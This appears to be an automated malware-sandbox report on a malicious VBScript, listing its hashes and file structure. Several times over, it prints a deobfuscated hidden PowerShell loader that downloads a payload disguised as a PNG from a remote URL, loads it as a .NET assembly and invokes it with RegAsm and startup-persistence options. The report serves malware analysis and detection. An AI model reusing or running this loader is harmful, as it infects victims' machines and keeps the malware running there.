Malicious
Malicious

884ce2d08babefbaf8058a21e0f5df9f

VBScript
|
MD5: 884ce2d08babefbaf8058a21e0f5df9f
|
Size: 1.97 MB
|
text/vbscript

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
884ce2d08babefbaf8058a21e0f5df9f
Sha1
3ff1c6f0127349a358f53f04ae5fa1974d2d11b6
Sha256
a1ac02a03b7f08e18a025ba93df774106bb832160755290609d8e648f1502e1e
Sha384
f2c101f9ee00838c530f462479b3a0068252c4e855b5677a58a0b404c8aa8fc242a9ac637966daec81dcd0d3c2580ae7
Sha512
8fc524b6d220f7497ee6ad0aa63a8f80664b58cd87655c2e6a805fda0bc9dd2ecdb42e1e95032e509c08a4ef1878fc4d0261c4918e8a55831378dea9a7f467df
SSDeep
24576:uY54P3Ow7tY54P3Ow7tY54P3Ow7kY54P3Ow7tY54P3Ow74:uFW4FW4FWhFW4FW5
TLSH
EF95E1CAB94D5784488672FA65388662F5DDC3E03306D7A2EE38C65473C28F8D97B781
File Structure
884ce2d08babefbaf8058a21e0f5df9f
Malicious
884ce2d08babefbaf8058a21e0f5df9f.deobfuscated.vbs
Malicious
[Command #0]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
Artefacts
Name
 Value
URLs in VB Code - #1

http://www.ostrosoft.com/smtp.html
Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgyMS9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPVFIZTA1Q2NWTjNiMDVXWnRWM1l2UkVNeVVTWQoNMFZHY3lGMlF2a2lNb0FqTWxFR2RsQm5jaE5HTXlVU1kyVldkTzlTTXhBRE82Y21jdjV5Y3VSMmFqVkhadVEzYnpOM0x2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJycsJ05hbWVfRmlsZScsJ1JlZ0FzbScsJycsJ1JlZ0FzbScsJycsJycsJycsJ05hbWVfRmlsZScsJ3ZicycsJzEnLCcnLCcnLCcwJywnc3RhcnR1cF9vbnN0YXJ0JykpOw==')) | Invoke-Expression"
Deobfuscated PowerShell

Invoke-Expression
Deobfuscated PowerShell

Invoke-Expression
Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05CcVN3b05WZtV3YvREMyUSY 0VGcyF2QvkiMoAjMlEGdlBnchNGMyUSY2VWdO9SMxADO6cmcv5ycuR2ajVHZuQ3bzN3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "RegAsm", "", "RegAsm", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } ))
Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgyMS9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPVFIZTA1Q2NWTjNiMDVXWnRWM1l2UkVNeVVTWQoNMFZHY3lGMlF2a2lNb0FqTWxFR2RsQm5jaE5HTXlVU1kyVldkTzlTTXhBRE82Y21jdjV5Y3VSMmFqVkhadVEzYnpOM0x2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJycsJ05hbWVfRmlsZScsJ1JlZ0FzbScsJycsJ1JlZ0FzbScsJycsJycsJycsJ05hbWVfRmlsZScsJ3ZicycsJzEnLCcnLCcnLCcwJywnc3RhcnR1cF9vbnN0YXJ0JykpOw==')) | Invoke-Expression"
Deobfuscated PowerShell

Invoke-Expression
Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05CcVN3b05WZtV3YvREMyUSY 0VGcyF2QvkiMoAjMlEGdlBnchNGMyUSY2VWdO9SMxADO6cmcv5ycuR2ajVHZuQ3bzN3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "RegAsm", "", "RegAsm", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } ))
884ce2d08babefbaf8058a21e0f5df9f (1.97 MB)
File Structure
884ce2d08babefbaf8058a21e0f5df9f
Malicious
884ce2d08babefbaf8058a21e0f5df9f.deobfuscated.vbs
Malicious
[Command #0]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
URLs in VB Code - #1

http://www.ostrosoft.com/smtp.html

884ce2d08babefbaf8058a21e0f5df9f
Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgyMS9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPVFIZTA1Q2NWTjNiMDVXWnRWM1l2UkVNeVVTWQoNMFZHY3lGMlF2a2lNb0FqTWxFR2RsQm5jaE5HTXlVU1kyVldkTzlTTXhBRE82Y21jdjV5Y3VSMmFqVkhadVEzYnpOM0x2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJycsJ05hbWVfRmlsZScsJ1JlZ0FzbScsJycsJ1JlZ0FzbScsJycsJycsJycsJ05hbWVfRmlsZScsJ3ZicycsJzEnLCcnLCcnLCcwJywnc3RhcnR1cF9vbnN0YXJ0JykpOw==')) | Invoke-Expression"

Malicious

884ce2d08babefbaf8058a21e0f5df9f > 884ce2d08babefbaf8058a21e0f5df9f.deobfuscated.vbs > [Command #0]

Deobfuscated PowerShell

Invoke-Expression

Malicious

884ce2d08babefbaf8058a21e0f5df9f > 884ce2d08babefbaf8058a21e0f5df9f.deobfuscated.vbs > [Command #0] > [PowerShell Command]
Deobfuscated PowerShell

Invoke-Expression

Malicious

884ce2d08babefbaf8058a21e0f5df9f > 884ce2d08babefbaf8058a21e0f5df9f.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS]
Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05CcVN3b05WZtV3YvREMyUSY 0VGcyF2QvkiMoAjMlEGdlBnchNGMyUSY2VWdO9SMxADO6cmcv5ycuR2ajVHZuQ3bzN3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "RegAsm", "", "RegAsm", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } ))

Malicious

884ce2d08babefbaf8058a21e0f5df9f > 884ce2d08babefbaf8058a21e0f5df9f.deobfuscated.vbs > [Command #0] > [Base64-Block]
Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvb3B0aW1pemVkX21zaV8yMDI1MDgyMS9vcHRpbWl6ZWRfTVNJLnBuZycpIC1tYXRjaCAnQmFzZVN0YXJ0LSguKj8pLUJhc2VFbmQnKTskdmFsb3IgPSAkbWF0Y2hlc1sxXTskYXNzZW1ibHkgPSBbUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2YWxvcikpOyRvbGluaWEgPSAnPVFIZTA1Q2NWTjNiMDVXWnRWM1l2UkVNeVVTWQoNMFZHY3lGMlF2a2lNb0FqTWxFR2RsQm5jaE5HTXlVU1kyVldkTzlTTXhBRE82Y21jdjV5Y3VSMmFqVkhadVEzYnpOM0x2b0RjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJycsJ05hbWVfRmlsZScsJ1JlZ0FzbScsJycsJ1JlZ0FzbScsJycsJycsJycsJ05hbWVfRmlsZScsJ3ZicycsJzEnLCcnLCcnLCcwJywnc3RhcnR1cF9vbnN0YXJ0JykpOw==')) | Invoke-Expression"

Malicious

884ce2d08babefbaf8058a21e0f5df9f > 884ce2d08babefbaf8058a21e0f5df9f.deobfuscated.vbs > [Command #0] > [Deobfuscated PS]
Deobfuscated PowerShell

Invoke-Expression

Malicious

884ce2d08babefbaf8058a21e0f5df9f > 884ce2d08babefbaf8058a21e0f5df9f.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command]
Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=QHe05CcVN3b05WZtV3YvREMyUSY 0VGcyF2QvkiMoAjMlEGdlBnchNGMyUSY2VWdO9SMxADO6cmcv5ycuR2ajVHZuQ3bzN3LvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "RegAsm", "", "RegAsm", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } ))

Malicious

884ce2d08babefbaf8058a21e0f5df9f > 884ce2d08babefbaf8058a21e0f5df9f.deobfuscated.vbs > [Command #0] > [Base64-Block] > [Deobfuscated PS]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙